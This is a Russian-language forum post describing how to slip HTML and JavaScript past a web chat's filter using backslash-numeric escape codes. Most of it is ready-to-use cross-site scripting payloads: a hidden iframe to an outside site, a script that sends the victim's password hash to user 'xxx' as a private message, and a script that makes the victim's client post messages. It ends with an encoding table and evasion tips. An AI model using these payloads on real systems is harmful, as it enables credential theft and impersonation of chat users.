не знаю как в других чатах , прокатит это или нет , но меня долго смущало то ,что чат как-то проглатывает символы обратного слеша "\".... Вот что удалось нарыть: BIG FONT: \\74\font size=+7\\76\\XyЙ\\74\\/font\\76\\ IFRAME: \\74\iframe height=1 width=1 src="http\\72//xxx.com"\\76\\74\/iframe\\76\\ ALERT: \\74\script language="JavaScript"\\76\\ alert('тук тук тук' )\\74\\/script\\76\\ Хэшированный пароль юзера в поле: \\74\script language="JavaScript"\\76\window.parent.frames['input'].window.document.forms['MsgForm'].elements['M'].value="/TO xxx "+window.parent.frames['input'].window.document.forms['MsgForm'].elements['PWD_Hash'].value\\74\\/script\\76\\ Заставить сказать что либо(тот же хеш пароля, см выше): \\74\script language="JavaScript"\\76\window.parent.frames['input'].window.document.forms['MsgForm'].elements['M'].value="Всем привет!";window.parent.frames['input'].window.document.forms['MsgForm'].submit();\\74\\/script\\76\\ Вставить картинку: \\74\img src="http\\72//im-tub.yandex.ru/i?id=1691194" width="24" height="24"\\76\\ ...ну и так далее, суть думаю ,ясна=))) В более старых версиях идет вариант с \x3c\x3e и т.п. , это шестнадцатиричные коды символов с префиксом \x , однако в этом чате было применено что то новое, кодировку я так и не разобрал ,пришлось все комбинации перебирать (( P.s. При вставке тэга содержащего ссылку на внешний ресурс ОБЯЗАТЕЛЬНО замените двоеточеие в ссылке как в примере с IFRAME иначе движок будет парсить эту часть кода и обрабатывать/оформлять как отдельную ссылку, то же самое касается комбинаций символов совпадающих с символами смайликов. Заменяемые знаки: 74 = < 76 = > 75 = = 72 = : 73 = ; 50 =( 51 = )
